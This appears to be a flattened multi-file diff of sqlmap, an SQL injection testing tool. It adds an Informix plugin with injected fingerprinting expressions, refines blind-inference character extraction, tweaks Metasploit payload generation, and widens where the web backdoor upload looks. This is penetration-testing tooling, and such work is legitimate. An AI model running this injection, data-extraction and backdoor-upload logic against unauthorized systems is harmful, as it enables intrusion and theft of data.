else: else:
kb.lastParserStatus = None kb.lastParserStatus = None
kb.cache.parsedDbms[key] = handler.dbms
# generic SQL warning/error messages # generic SQL warning/error messages
if re.search(r"SQL (warning|error|syntax)", page, re.I): if re.search(r"SQL (warning|error|syntax)", page, re.I):
handler._markAsErrorPage() handler._markAsErrorPage()

View File

@@ -26,6 +26,7 @@ from lib.core.common import singleTimeWarnMessage
from lib.core.data import conf from lib.core.data import conf
from lib.core.data import kb from lib.core.data import kb
from lib.core.data import logger from lib.core.data import logger
from lib.core.decorators import cachedmethod
from lib.core.enums import DBMS from lib.core.enums import DBMS
from lib.core.enums import HTTP_HEADER from lib.core.enums import HTTP_HEADER
from lib.core.enums import PLACE from lib.core.enums import PLACE
@@ -136,6 +137,7 @@ def parseResponse(page, headers):
if page: if page:
htmlParser(page) htmlParser(page)
@cachedmethod
def checkCharEncoding(encoding, warn=True): def checkCharEncoding(encoding, warn=True):
""" """
Checks encoding name, repairs common misspellings and adjusts to Checks encoding name, repairs common misspellings and adjusts to
@@ -230,7 +232,10 @@ def getHeuristicCharEncoding(page):
Returns page encoding charset detected by usage of heuristics Returns page encoding charset detected by usage of heuristics
Reference: http://chardet.feedparser.org/docs/ Reference: http://chardet.feedparser.org/docs/
""" """
retVal = detect(page)["encoding"]
key = hash(page)
retVal = kb.cache.encoding.get(key) or detect(page)["encoding"]
kb.cache.encoding[key] = retVal
if retVal: if retVal:
infoMsg = "heuristics detected web page charset '%s'" % retVal infoMsg = "heuristics detected web page charset '%s'" % retVal
@@ -336,6 +341,8 @@ def processResponse(page, responseHeaders):
if not kb.tableFrom and Backend.getIdentifiedDbms() in (DBMS.ACCESS,): if not kb.tableFrom and Backend.getIdentifiedDbms() in (DBMS.ACCESS,):
kb.tableFrom = extractRegexResult(SELECT_FROM_TABLE_REGEX, page) kb.tableFrom = extractRegexResult(SELECT_FROM_TABLE_REGEX, page)
else:
kb.tableFrom = None
if conf.parseErrors: if conf.parseErrors:
msg = extractErrorMessage(page) msg = extractErrorMessage(page)
@@ -351,6 +358,10 @@ def processResponse(page, responseHeaders):
if PLACE.POST in conf.paramDict and name in conf.paramDict[PLACE.POST]: if PLACE.POST in conf.paramDict and name in conf.paramDict[PLACE.POST]:
if conf.paramDict[PLACE.POST][name] in page: if conf.paramDict[PLACE.POST][name] in page:
continue continue
else:
msg = "do you want to automatically adjust the value of '%s'? [y/N]" % name
if readInput(msg, default='N').strip().upper() != 'Y':
continue
conf.paramDict[PLACE.POST][name] = value conf.paramDict[PLACE.POST][name] = value
conf.parameters[PLACE.POST] = re.sub("(?i)(%s=)[^&]+" % name, r"\g<1>%s" % value, conf.parameters[PLACE.POST]) conf.parameters[PLACE.POST] = re.sub("(?i)(%s=)[^&]+" % name, r"\g<1>%s" % value, conf.parameters[PLACE.POST])

View File

@@ -26,6 +26,7 @@ from lib.core.settings import MAX_RATIO
from lib.core.settings import REFLECTED_VALUE_MARKER from lib.core.settings import REFLECTED_VALUE_MARKER
from lib.core.settings import LOWER_RATIO_BOUND from lib.core.settings import LOWER_RATIO_BOUND
from lib.core.settings import UPPER_RATIO_BOUND from lib.core.settings import UPPER_RATIO_BOUND
from lib.core.settings import URI_HTTP_HEADER
from lib.core.threads import getCurrentThreadData from lib.core.threads import getCurrentThreadData
def comparison(page, headers, code=None, getRatioValue=False, pageLength=None): def comparison(page, headers, code=None, getRatioValue=False, pageLength=None):
@@ -48,7 +49,7 @@ def _comparison(page, headers, code, getRatioValue, pageLength):
threadData = getCurrentThreadData() threadData = getCurrentThreadData()
if kb.testMode: if kb.testMode:
threadData.lastComparisonHeaders = listToStrValue(headers.headers) if headers else "" threadData.lastComparisonHeaders = listToStrValue([_ for _ in headers.headers if not _.startswith("%s:" % URI_HTTP_HEADER)]) if headers else ""
threadData.lastComparisonPage = page threadData.lastComparisonPage = page
threadData.lastComparisonCode = code threadData.lastComparisonCode = code
@@ -56,7 +57,7 @@ def _comparison(page, headers, code, getRatioValue, pageLength):
return None return None
if any((conf.string, conf.notString, conf.regexp)): if any((conf.string, conf.notString, conf.regexp)):
rawResponse = "%s%s" % (listToStrValue(headers.headers) if headers else "", page) rawResponse = "%s%s" % (listToStrValue([_ for _ in headers.headers if not _.startswith("%s:" % URI_HTTP_HEADER)]) if headers else "", page)
# String to match in page when the query is True and/or valid # String to match in page when the query is True and/or valid
if conf.string: if conf.string:

View File

@@ -90,6 +90,7 @@ from lib.core.settings import HTTP_ACCEPT_ENCODING_HEADER_VALUE
from lib.core.settings import MAX_CONNECTION_CHUNK_SIZE from lib.core.settings import MAX_CONNECTION_CHUNK_SIZE
from lib.core.settings import MAX_CONNECTIONS_REGEX from lib.core.settings import MAX_CONNECTIONS_REGEX
from lib.core.settings import MAX_CONNECTION_TOTAL_SIZE from lib.core.settings import MAX_CONNECTION_TOTAL_SIZE
from lib.core.settings import MAX_MURPHY_SLEEP_TIME
from lib.core.settings import META_REFRESH_REGEX from lib.core.settings import META_REFRESH_REGEX
from lib.core.settings import MIN_TIME_RESPONSES from lib.core.settings import MIN_TIME_RESPONSES
from lib.core.settings import IS_WIN from lib.core.settings import IS_WIN
@@ -224,8 +225,10 @@ class Connect(object):
if conf.offline: if conf.offline:
return None, None, None return None, None, None
elif conf.dummy: elif conf.dummy or conf.murphyRate and randomInt() % conf.murphyRate == 0:
return getUnicode(randomStr(int(randomInt()), alphabet=[chr(_) for _ in xrange(256)]), {}, int(randomInt())), None, None if conf.murphyRate:
time.sleep(randomInt() % (MAX_MURPHY_SLEEP_TIME + 1))
return getUnicode(randomStr(int(randomInt()), alphabet=[chr(_) for _ in xrange(256)]), {}, int(randomInt())), None, None if not conf.murphyRate else randomInt(3)
threadData = getCurrentThreadData() threadData = getCurrentThreadData()
with kb.locks.request: with kb.locks.request:
@@ -403,7 +406,7 @@ class Connect(object):
responseHeaders = _(ws.getheaders()) responseHeaders = _(ws.getheaders())
responseHeaders.headers = ["%s: %s\r\n" % (_[0].capitalize(), _[1]) for _ in responseHeaders.items()] responseHeaders.headers = ["%s: %s\r\n" % (_[0].capitalize(), _[1]) for _ in responseHeaders.items()]
requestHeaders += "\n".join("%s: %s" % (getUnicode(key.capitalize() if isinstance(key, basestring) else key), getUnicode(value)) for (key, value) in responseHeaders.items()) requestHeaders += "\n".join(["%s: %s" % (getUnicode(key.capitalize() if isinstance(key, basestring) else key), getUnicode(value)) for (key, value) in responseHeaders.items()])
requestMsg += "\n%s" % requestHeaders requestMsg += "\n%s" % requestHeaders
if post is not None: if post is not None:
@@ -422,7 +425,7 @@ class Connect(object):
else: else:
req = urllib2.Request(url, post, headers) req = urllib2.Request(url, post, headers)
requestHeaders += "\n".join("%s: %s" % (getUnicode(key.capitalize() if isinstance(key, basestring) else key), getUnicode(value)) for (key, value) in req.header_items()) requestHeaders += "\n".join(["%s: %s" % (getUnicode(key.capitalize() if isinstance(key, basestring) else key), getUnicode(value)) for (key, value) in req.header_items()])
if not getRequestHeader(req, HTTP_HEADER.COOKIE) and conf.cj: if not getRequestHeader(req, HTTP_HEADER.COOKIE) and conf.cj:
conf.cj._policy._now = conf.cj._now = int(time.time()) conf.cj._policy._now = conf.cj._now = int(time.time())
@@ -556,7 +559,7 @@ class Connect(object):
responseMsg += "[#%d] (%d %s):\n" % (threadData.lastRequestUID, code, status) responseMsg += "[#%d] (%d %s):\n" % (threadData.lastRequestUID, code, status)
if responseHeaders: if responseHeaders:
logHeaders = "\n".join("%s: %s" % (getUnicode(key.capitalize() if isinstance(key, basestring) else key), getUnicode(value)) for (key, value) in responseHeaders.items()) logHeaders = "\n".join(["%s: %s" % (getUnicode(key.capitalize() if isinstance(key, basestring) else key), getUnicode(value)) for (key, value) in responseHeaders.items()])
logHTTPTraffic(requestMsg, "%s%s\n\n%s" % (responseMsg, logHeaders, (page or "")[:MAX_CONNECTION_CHUNK_SIZE])) logHTTPTraffic(requestMsg, "%s%s\n\n%s" % (responseMsg, logHeaders, (page or "")[:MAX_CONNECTION_CHUNK_SIZE]))
@@ -691,7 +694,7 @@ class Connect(object):
responseMsg += "[#%d] (%d %s):\n" % (threadData.lastRequestUID, code, status) responseMsg += "[#%d] (%d %s):\n" % (threadData.lastRequestUID, code, status)
if responseHeaders: if responseHeaders:
logHeaders = "\n".join("%s: %s" % (getUnicode(key.capitalize() if isinstance(key, basestring) else key), getUnicode(value)) for (key, value) in responseHeaders.items()) logHeaders = "\n".join(["%s: %s" % (getUnicode(key.capitalize() if isinstance(key, basestring) else key), getUnicode(value)) for (key, value) in responseHeaders.items()])
if not skipLogTraffic: if not skipLogTraffic:
logHTTPTraffic(requestMsg, "%s%s\n\n%s" % (responseMsg, logHeaders, (page or "")[:MAX_CONNECTION_CHUNK_SIZE])) logHTTPTraffic(requestMsg, "%s%s\n\n%s" % (responseMsg, logHeaders, (page or "")[:MAX_CONNECTION_CHUNK_SIZE]))
@@ -1073,7 +1076,7 @@ class Connect(object):
dataToStdout(" (done)\n") dataToStdout(" (done)\n")
elif not kb.testMode: elif not kb.testMode:
warnMsg = "it is very important to not stress the network adapter " warnMsg = "it is very important to not stress the network connection "
warnMsg += "during usage of time-based payloads to prevent potential " warnMsg += "during usage of time-based payloads to prevent potential "
warnMsg += "disruptions " warnMsg += "disruptions "
singleTimeWarnMessage(warnMsg) singleTimeWarnMessage(warnMsg)
@@ -1140,6 +1143,7 @@ class Connect(object):
threadData.lastQueryDuration = calculateDeltaSeconds(start) threadData.lastQueryDuration = calculateDeltaSeconds(start)
threadData.lastPage = page threadData.lastPage = page
threadData.lastCode = code
kb.originalCode = kb.originalCode or code kb.originalCode = kb.originalCode or code

View File

@@ -429,10 +429,12 @@ class Metasploit:
self._payloadCmd += " X > \"%s\"" % outFile self._payloadCmd += " X > \"%s\"" % outFile
else: else:
if extra == "BufferRegister=EAX": if extra == "BufferRegister=EAX":
self._payloadCmd += " -a x86 -e %s -f %s > \"%s\"" % (self.encoderStr, format, outFile) self._payloadCmd += " -a x86 -e %s -f %s" % (self.encoderStr, format)
if extra is not None: if extra is not None:
self._payloadCmd += " %s" % extra self._payloadCmd += " %s" % extra
self._payloadCmd += " > \"%s\"" % outFile
else: else:
self._payloadCmd += " -f exe > \"%s\"" % outFile self._payloadCmd += " -f exe > \"%s\"" % outFile

View File

@@ -116,7 +116,7 @@ class Web:
multipartParams['__EVENTVALIDATION'] = kb.data.__EVENTVALIDATION multipartParams['__EVENTVALIDATION'] = kb.data.__EVENTVALIDATION
multipartParams['__VIEWSTATE'] = kb.data.__VIEWSTATE multipartParams['__VIEWSTATE'] = kb.data.__VIEWSTATE
page = Request.getPage(url=self.webStagerUrl, multipart=multipartParams, raise404=False) page, _, _ = Request.getPage(url=self.webStagerUrl, multipart=multipartParams, raise404=False)
if "File uploaded" not in page: if "File uploaded" not in page:
warnMsg = "unable to upload the file through the web file " warnMsg = "unable to upload the file through the web file "
@@ -200,6 +200,15 @@ class Web:
directories.extend(getAutoDirectories()) directories.extend(getAutoDirectories())
directories = list(oset(directories)) directories = list(oset(directories))
path = urlparse.urlparse(conf.url).path or '/'
if path != '/':
_ = []
for directory in directories:
_.append(directory)
if not directory.endswith(path):
_.append("%s/%s" % (directory.rstrip('/'), path.strip('/')))
directories = _
backdoorName = "tmpb%s.%s" % (randomStr(lowercase=True), self.webApi) backdoorName = "tmpb%s.%s" % (randomStr(lowercase=True), self.webApi)
backdoorContent = decloak(os.path.join(paths.SQLMAP_SHELL_PATH, "backdoor.%s_" % self.webApi)) backdoorContent = decloak(os.path.join(paths.SQLMAP_SHELL_PATH, "backdoor.%s_" % self.webApi))

View File

@@ -41,7 +41,7 @@ from lib.core.settings import INFERENCE_GREATER_CHAR
from lib.core.settings import INFERENCE_EQUALS_CHAR from lib.core.settings import INFERENCE_EQUALS_CHAR
from lib.core.settings import INFERENCE_NOT_EQUALS_CHAR from lib.core.settings import INFERENCE_NOT_EQUALS_CHAR
from lib.core.settings import MAX_BISECTION_LENGTH from lib.core.settings import MAX_BISECTION_LENGTH
from lib.core.settings import MAX_TIME_REVALIDATION_STEPS from lib.core.settings import MAX_REVALIDATION_STEPS
from lib.core.settings import NULL from lib.core.settings import NULL
from lib.core.settings import PARTIAL_HEX_VALUE_MARKER from lib.core.settings import PARTIAL_HEX_VALUE_MARKER
from lib.core.settings import PARTIAL_VALUE_MARKER from lib.core.settings import PARTIAL_VALUE_MARKER
@@ -66,6 +66,7 @@ def bisection(payload, expression, length=None, charsetType=None, firstChar=None
finalValue = None finalValue = None
retrievedLength = 0 retrievedLength = 0
asciiTbl = getCharset(charsetType) asciiTbl = getCharset(charsetType)
threadData = getCurrentThreadData()
timeBasedCompare = (kb.technique in (PAYLOAD.TECHNIQUE.TIME, PAYLOAD.TECHNIQUE.STACKED)) timeBasedCompare = (kb.technique in (PAYLOAD.TECHNIQUE.TIME, PAYLOAD.TECHNIQUE.STACKED))
retVal = hashDBRetrieve(expression, checkConf=True) retVal = hashDBRetrieve(expression, checkConf=True)
@@ -143,7 +144,7 @@ def bisection(payload, expression, length=None, charsetType=None, firstChar=None
length = None length = None
showEta = conf.eta and isinstance(length, int) showEta = conf.eta and isinstance(length, int)
numThreads = min(conf.threads, length) numThreads = min(conf.threads, length) or 1
if showEta: if showEta:
progress = ProgressBar(maxValue=length) progress = ProgressBar(maxValue=length)
@@ -197,8 +198,7 @@ def bisection(payload, expression, length=None, charsetType=None, firstChar=None
def validateChar(idx, value): def validateChar(idx, value):
""" """
Used in time-based inference (in case that original and retrieved Used in inference - in time-based SQLi if original and retrieved value are not equal there will be a deliberate delay
value are not equal there will be a deliberate delay).
""" """
if "'%s'" % CHAR_INFERENCE_MARK not in payload: if "'%s'" % CHAR_INFERENCE_MARK not in payload:
@@ -209,10 +209,17 @@ def bisection(payload, expression, length=None, charsetType=None, firstChar=None
unescapedCharValue = unescaper.escape("'%s'" % decodeIntToUnicode(value)) unescapedCharValue = unescaper.escape("'%s'" % decodeIntToUnicode(value))
forgedPayload = safeStringFormat(payload.replace(INFERENCE_GREATER_CHAR, INFERENCE_NOT_EQUALS_CHAR), (expressionUnescaped, idx)).replace(markingValue, unescapedCharValue) forgedPayload = safeStringFormat(payload.replace(INFERENCE_GREATER_CHAR, INFERENCE_NOT_EQUALS_CHAR), (expressionUnescaped, idx)).replace(markingValue, unescapedCharValue)
result = Request.queryPage(forgedPayload, timeBasedCompare=timeBasedCompare, raise404=False) result = not Request.queryPage(forgedPayload, timeBasedCompare=timeBasedCompare, raise404=False)
if result and timeBasedCompare:
result = threadData.lastCode == kb.injection.data[kb.technique].trueCode
if not result:
warnMsg = "detected HTTP code '%s' in validation phase is differing from expected '%s'" % (threadData.lastCode, kb.injection.data[kb.technique].trueCode)
singleTimeWarnMessage(warnMsg)
incrementCounter(kb.technique) incrementCounter(kb.technique)
return not result return result
def getChar(idx, charTbl=None, continuousOrder=True, expand=charsetType is None, shiftTable=None, retried=None): def getChar(idx, charTbl=None, continuousOrder=True, expand=charsetType is None, shiftTable=None, retried=None):
""" """
@@ -254,9 +261,44 @@ def bisection(payload, expression, length=None, charsetType=None, firstChar=None
maxChar = maxValue = charTbl[-1] maxChar = maxValue = charTbl[-1]
minChar = minValue = charTbl[0] minChar = minValue = charTbl[0]
firstCheck = False
lastCheck = False
unexpectedCode = False
while len(charTbl) != 1: while len(charTbl) != 1:
position = None
if charsetType is None:
if not firstCheck:
try:
try:
lastChar = [_ for _ in threadData.shared.value if _ is not None][-1]
except IndexError:
lastChar = None
if 'a' <= lastChar <= 'z':
position = charTbl.index(ord('a') - 1) # 96
elif 'A' <= lastChar <= 'Z':
position = charTbl.index(ord('A') - 1) # 64
elif '0' <= lastChar <= '9':
position = charTbl.index(ord('0') - 1) # 47
except ValueError:
pass
finally:
firstCheck = True
elif not lastCheck and numThreads == 1: # not usable in multi-threading environment
if charTbl[(len(charTbl) >> 1)] < ord(' '):
try:
# favorize last char check if current value inclines toward 0
position = charTbl.index(1)
except ValueError:
pass
finally:
lastCheck = True
if position is None:
position = (len(charTbl) >> 1) position = (len(charTbl) >> 1)
posValue = charTbl[position] posValue = charTbl[position]
falsePayload = None falsePayload = None
@@ -279,6 +321,12 @@ def bisection(payload, expression, length=None, charsetType=None, firstChar=None
result = Request.queryPage(forgedPayload, timeBasedCompare=timeBasedCompare, raise404=False) result = Request.queryPage(forgedPayload, timeBasedCompare=timeBasedCompare, raise404=False)
incrementCounter(kb.technique) incrementCounter(kb.technique)
if not timeBasedCompare:
unexpectedCode |= threadData.lastCode not in (kb.injection.data[kb.technique].falseCode, kb.injection.data[kb.technique].trueCode)
if unexpectedCode:
warnMsg = "unexpected HTTP code '%s' detected. Will use (extra) validation step in similar cases" % threadData.lastCode
singleTimeWarnMessage(warnMsg)
if result: if result:
minValue = posValue minValue = posValue
@@ -318,15 +366,16 @@ def bisection(payload, expression, length=None, charsetType=None, firstChar=None
retVal = minValue + 1 retVal = minValue + 1
if retVal in originalTbl or (retVal == ord('\n') and CHAR_INFERENCE_MARK in payload): if retVal in originalTbl or (retVal == ord('\n') and CHAR_INFERENCE_MARK in payload):
if timeBasedCompare and not validateChar(idx, retVal): if (timeBasedCompare or unexpectedCode) and not validateChar(idx, retVal):
if not kb.originalTimeDelay: if not kb.originalTimeDelay:
kb.originalTimeDelay = conf.timeSec kb.originalTimeDelay = conf.timeSec
kb.timeValidCharsRun = 0 threadData.validationRun = 0
if retried < MAX_TIME_REVALIDATION_STEPS: if retried < MAX_REVALIDATION_STEPS:
errMsg = "invalid character detected. retrying.." errMsg = "invalid character detected. retrying.."
logger.error(errMsg) logger.error(errMsg)
if timeBasedCompare:
if kb.adjustTimeDelay is not ADJUST_TIME_DELAY.DISABLE: if kb.adjustTimeDelay is not ADJUST_TIME_DELAY.DISABLE:
conf.timeSec += 1 conf.timeSec += 1
warnMsg = "increasing time delay to %d second%s " % (conf.timeSec, 's' if conf.timeSec > 1 else '') warnMsg = "increasing time delay to %d second%s " % (conf.timeSec, 's' if conf.timeSec > 1 else '')
@@ -345,8 +394,8 @@ def bisection(payload, expression, length=None, charsetType=None, firstChar=None
return decodeIntToUnicode(retVal) return decodeIntToUnicode(retVal)
else: else:
if timeBasedCompare: if timeBasedCompare:
kb.timeValidCharsRun += 1 threadData.validationRun += 1
if kb.adjustTimeDelay is ADJUST_TIME_DELAY.NO and kb.timeValidCharsRun > VALID_TIME_CHARS_RUN_THRESHOLD: if kb.adjustTimeDelay is ADJUST_TIME_DELAY.NO and threadData.validationRun > VALID_TIME_CHARS_RUN_THRESHOLD:
dbgMsg = "turning back on time auto-adjustment mechanism" dbgMsg = "turning back on time auto-adjustment mechanism"
logger.debug(dbgMsg) logger.debug(dbgMsg)
kb.adjustTimeDelay = ADJUST_TIME_DELAY.YES kb.adjustTimeDelay = ADJUST_TIME_DELAY.YES
@@ -376,8 +425,6 @@ def bisection(payload, expression, length=None, charsetType=None, firstChar=None
# Go multi-threading (--threads > 1) # Go multi-threading (--threads > 1)
if conf.threads > 1 and isinstance(length, int) and length > 1: if conf.threads > 1 and isinstance(length, int) and length > 1:
threadData = getCurrentThreadData()
threadData.shared.value = [None] * length threadData.shared.value = [None] * length
threadData.shared.index = [firstChar] # As list for python nested function scoping threadData.shared.index = [firstChar] # As list for python nested function scoping
threadData.shared.start = firstChar threadData.shared.start = firstChar
@@ -476,6 +523,7 @@ def bisection(payload, expression, length=None, charsetType=None, firstChar=None
# No multi-threading (--threads = 1) # No multi-threading (--threads = 1)
else: else:
index = firstChar index = firstChar
threadData.shared.value = ""
while True: while True:
index += 1 index += 1
@@ -551,7 +599,7 @@ def bisection(payload, expression, length=None, charsetType=None, firstChar=None
if kb.data.processChar: if kb.data.processChar:
val = kb.data.processChar(val) val = kb.data.processChar(val)
partialValue += val threadData.shared.value = partialValue = partialValue + val
if showEta: if showEta:
progress.progress(time.time() - charStart, index) progress.progress(time.time() - charStart, index)

View File

@@ -44,6 +44,8 @@ def checkDependencies():
elif dbmsName == DBMS.HSQLDB: elif dbmsName == DBMS.HSQLDB:
import jaydebeapi import jaydebeapi
import jpype import jpype
elif dbmsName == DBMS.INFORMIX:
import ibm_db_dbi
except ImportError: except ImportError:
warnMsg = "sqlmap requires '%s' third-party library " % data[1] warnMsg = "sqlmap requires '%s' third-party library " % data[1]
warnMsg += "in order to directly connect to the DBMS " warnMsg += "in order to directly connect to the DBMS "

View File

@@ -85,3 +85,9 @@ class xrange(object):
def _index(self, i): def _index(self, i):
return self.start + self.step * i return self.start + self.step * i
def index(self, i):
if self.start <= i < self.stop:
return i - self.start
else:
raise ValueError("%d is not in list" % i)

View File

@@ -0,0 +1,34 @@
#!/usr/bin/env python
"""
Copyright (c) 2006-2016 sqlmap developers (http://sqlmap.org/)
See the file 'doc/COPYING' for copying permission
"""
from lib.core.enums import DBMS
from lib.core.settings import INFORMIX_SYSTEM_DBS
from lib.core.unescaper import unescaper
from plugins.dbms.informix.enumeration import Enumeration
from plugins.dbms.informix.filesystem import Filesystem
from plugins.dbms.informix.fingerprint import Fingerprint
from plugins.dbms.informix.syntax import Syntax
from plugins.dbms.informix.takeover import Takeover
from plugins.generic.misc import Miscellaneous
class InformixMap(Syntax, Fingerprint, Enumeration, Filesystem, Miscellaneous, Takeover):
"""
This class defines Informix methods
"""
def __init__(self):
self.excludeDbsList = INFORMIX_SYSTEM_DBS
Syntax.__init__(self)
Fingerprint.__init__(self)
Enumeration.__init__(self)
Filesystem.__init__(self)
Miscellaneous.__init__(self)
Takeover.__init__(self)
unescaper[DBMS.INFORMIX] = Syntax.escape

View File

@@ -0,0 +1,63 @@
#!/usr/bin/env python
"""
Copyright (c) 2006-2016 sqlmap developers (http://sqlmap.org/)
See the file 'doc/COPYING' for copying permission
"""
try:
import ibm_db_dbi
except ImportError:
pass
import logging
from lib.core.data import conf
from lib.core.data import logger
from lib.core.exception import SqlmapConnectionException
from plugins.generic.connector import Connector as GenericConnector
class Connector(GenericConnector):
"""
Homepage: http://code.google.com/p/ibm-db/
User guide: http://code.google.com/p/ibm-db/wiki/README
API: http://www.python.org/dev/peps/pep-0249/
License: Apache License 2.0
"""
def __init__(self):
GenericConnector.__init__(self)
def connect(self):
self.initConnection()
try:
database = "DATABASE=%s;HOSTNAME=%s;PORT=%s;PROTOCOL=TCPIP;" % (self.db, self.hostname, self.port)
self.connector = ibm_db_dbi.connect(database, self.user, self.password)
except ibm_db_dbi.OperationalError, msg:
raise SqlmapConnectionException(msg)
self.initCursor()
self.printConnected()
def fetchall(self):
try:
return self.cursor.fetchall()
except ibm_db_dbi.ProgrammingError, msg:
logger.log(logging.WARN if conf.dbmsHandler else logging.DEBUG, "(remote) %s" % msg[1])
return None
def execute(self, query):
try:
self.cursor.execute(query)
except (ibm_db_dbi.OperationalError, ibm_db_dbi.ProgrammingError), msg:
logger.log(logging.WARN if conf.dbmsHandler else logging.DEBUG, "(remote) %s" % msg[1])
except ibm_db_dbi.InternalError, msg:
raise SqlmapConnectionException(msg[1])
self.connector.commit()
def select(self, query):
self.execute(query)
return self.fetchall()

View File

@@ -0,0 +1,12 @@
#!/usr/bin/env python
"""
Copyright (c) 2006-2016 sqlmap developers (http://sqlmap.org/)
See the file 'doc/COPYING' for copying permission
"""
from plugins.generic.enumeration import Enumeration as GenericEnumeration
class Enumeration(GenericEnumeration):
def __init__(self):
GenericEnumeration.__init__(self)

View File

@@ -0,0 +1,12 @@
#!/usr/bin/env python
"""
Copyright (c) 2006-2016 sqlmap developers (http://sqlmap.org/)
See the file 'doc/COPYING' for copying permission
"""
from plugins.generic.filesystem import Filesystem as GenericFilesystem
class Filesystem(GenericFilesystem):
def __init__(self):
GenericFilesystem.__init__(self)

View File

@@ -0,0 +1,105 @@
#!/usr/bin/env python
"""
Copyright (c) 2006-2016 sqlmap developers (http://sqlmap.org/)
See the file 'doc/COPYING' for copying permission
"""
from lib.core.common import Backend
from lib.core.common import Format
from lib.core.data import conf
from lib.core.data import kb
from lib.core.data import logger
from lib.core.enums import DBMS
from lib.core.session import setDbms
from lib.core.settings import INFORMIX_ALIASES
from lib.request import inject
from plugins.generic.fingerprint import Fingerprint as GenericFingerprint
class Fingerprint(GenericFingerprint):
def __init__(self):
GenericFingerprint.__init__(self, DBMS.INFORMIX)
def getFingerprint(self):
value = ""
wsOsFp = Format.getOs("web server", kb.headersFp)
if wsOsFp:
value += "%s\n" % wsOsFp
if kb.data.banner:
dbmsOsFp = Format.getOs("back-end DBMS", kb.bannerFp)
if dbmsOsFp:
value += "%s\n" % dbmsOsFp
value += "back-end DBMS: "
if not conf.extensiveFp:
value += DBMS.INFORMIX
return value
actVer = Format.getDbms()
blank = " " * 15
value += "active fingerprint: %s" % actVer
if kb.bannerFp:
banVer = kb.bannerFp["dbmsVersion"] if 'dbmsVersion' in kb.bannerFp else None
banVer = Format.getDbms([banVer])
value += "\n%sbanner parsing fingerprint: %s" % (blank, banVer)
htmlErrorFp = Format.getErrorParsedDBMSes()
if htmlErrorFp:
value += "\n%shtml error message fingerprint: %s" % (blank, htmlErrorFp)
return value
def checkDbms(self):
if not conf.extensiveFp and (Backend.isDbmsWithin(INFORMIX_ALIASES) or (conf.dbms or "").lower() in INFORMIX_ALIASES):
setDbms(DBMS.INFORMIX)
self.getBanner()
return True
infoMsg = "testing %s" % DBMS.INFORMIX
logger.info(infoMsg)
result = inject.checkBooleanExpression("[RANDNUM]=(SELECT [RANDNUM] FROM SYSMASTER:SYSDUAL)")
if result:
infoMsg = "confirming %s" % DBMS.INFORMIX
logger.info(infoMsg)
result = inject.checkBooleanExpression("(SELECT DBINFO('DBNAME') FROM SYSMASTER:SYSDUAL) IS NOT NULL")
if not result:
warnMsg = "the back-end DBMS is not %s" % DBMS.INFORMIX
logger.warn(warnMsg)
return False
setDbms(DBMS.INFORMIX)
self.getBanner()
if not conf.extensiveFp:
return True
infoMsg = "actively fingerprinting %s" % DBMS.INFORMIX
logger.info(infoMsg)
for version in ("12.1", "11.7", "11.5"):
output = inject.checkBooleanExpression("EXISTS(SELECT 1 FROM SYSMASTER:SYSDUAL WHERE DBINFO('VERSION,'FULL') LIKE '%%%s%%')" % version)
if output:
Backend.setVersion(version)
break
return True
else:
warnMsg = "the back-end DBMS is not %s" % DBMS.INFORMIX
logger.warn(warnMsg)
return False

View File

@@ -0,0 +1,24 @@
#!/usr/bin/env python
"""
Copyright (c) 2006-2016 sqlmap developers (http://sqlmap.org/)
See the file 'doc/COPYING' for copying permission
"""
from plugins.generic.syntax import Syntax as GenericSyntax
class Syntax(GenericSyntax):
def __init__(self):
GenericSyntax.__init__(self)
@staticmethod
def escape(expression, quote=True):
"""
>>> Syntax.escape("SELECT 'abcdefgh' FROM foobar")
'SELECT CHR(97)||CHR(98)||CHR(99)||CHR(100)||CHR(101)||CHR(102)||CHR(103)||CHR(104) FROM foobar'
"""
def escaper(value):
return "||".join("CHR(%d)" % ord(_) for _ in value)
return Syntax._escape(expression, quote, escaper)

View File

@@ -0,0 +1,15 @@
#!/usr/bin/env python
"""
Copyright (c) 2006-2016 sqlmap developers (http://sqlmap.org/)
See the file 'doc/COPYING' for copying permission
"""
from plugins.generic.takeover import Takeover as GenericTakeover
class Takeover(GenericTakeover):
def __init__(self):
self.__basedir = None
self.__datadir = None
GenericTakeover.__init__(self)

View File

@@ -49,9 +49,9 @@ class Fingerprint(GenericFingerprint):
(50000, 50092), # MySQL 5.0 (50000, 50092), # MySQL 5.0
(50100, 50172), # MySQL 5.1 (50100, 50172), # MySQL 5.1
(50400, 50404), # MySQL 5.4 (50400, 50404), # MySQL 5.4
(50500, 50549), # MySQL 5.5 (50500, 50552), # MySQL 5.5
(50600, 50630), # MySQL 5.6 (50600, 50633), # MySQL 5.6
(50700, 50712), # MySQL 5.7 (50700, 50715), # MySQL 5.7
(60000, 60014), # MySQL 6.0 (60000, 60014), # MySQL 6.0
) )

View File

@@ -97,8 +97,16 @@ class Fingerprint(GenericFingerprint):
infoMsg = "actively fingerprinting %s" % DBMS.PGSQL infoMsg = "actively fingerprinting %s" % DBMS.PGSQL
logger.info(infoMsg) logger.info(infoMsg)
if inject.checkBooleanExpression("REVERSE('sqlmap')='pamlqs'"): if inject.checkBooleanExpression("TO_JSONB(1) IS NOT NULL"):
Backend.setVersion(">= 9.1.0") Backend.setVersion(">= 9.5.0")
elif inject.checkBooleanExpression("JSON_TYPEOF(NULL) IS NULL"):
Backend.setVersionList([">= 9.4.0", "< 9.5.0"])
elif inject.checkBooleanExpression("ARRAY_REPLACE(NULL,1,1) IS NULL"):
Backend.setVersionList([">= 9.3.0", "< 9.4.0"])
elif inject.checkBooleanExpression("ROW_TO_JSON(NULL) IS NULL"):
Backend.setVersionList([">= 9.2.0", "< 9.3.0"])
elif inject.checkBooleanExpression("REVERSE('sqlmap')='pamlqs'"):
Backend.setVersionList([">= 9.1.0", "< 9.2.0"])
elif inject.checkBooleanExpression("LENGTH(TO_CHAR(1,'EEEE'))>0"): elif inject.checkBooleanExpression("LENGTH(TO_CHAR(1,'EEEE'))>0"):
Backend.setVersionList([">= 9.0.0", "< 9.1.0"]) Backend.setVersionList([">= 9.0.0", "< 9.1.0"])
elif inject.checkBooleanExpression("2=(SELECT DIV(6,3))"): elif inject.checkBooleanExpression("2=(SELECT DIV(6,3))"):

View File

@@ -32,6 +32,7 @@ from lib.core.data import logger
from lib.core.data import paths from lib.core.data import paths
from lib.core.data import queries from lib.core.data import queries
from lib.core.dicts import FIREBIRD_TYPES from lib.core.dicts import FIREBIRD_TYPES
from lib.core.dicts import INFORMIX_TYPES
from lib.core.enums import CHARSET_TYPE from lib.core.enums import CHARSET_TYPE
from lib.core.enums import DBMS from lib.core.enums import DBMS
from lib.core.enums import EXPECTED from lib.core.enums import EXPECTED
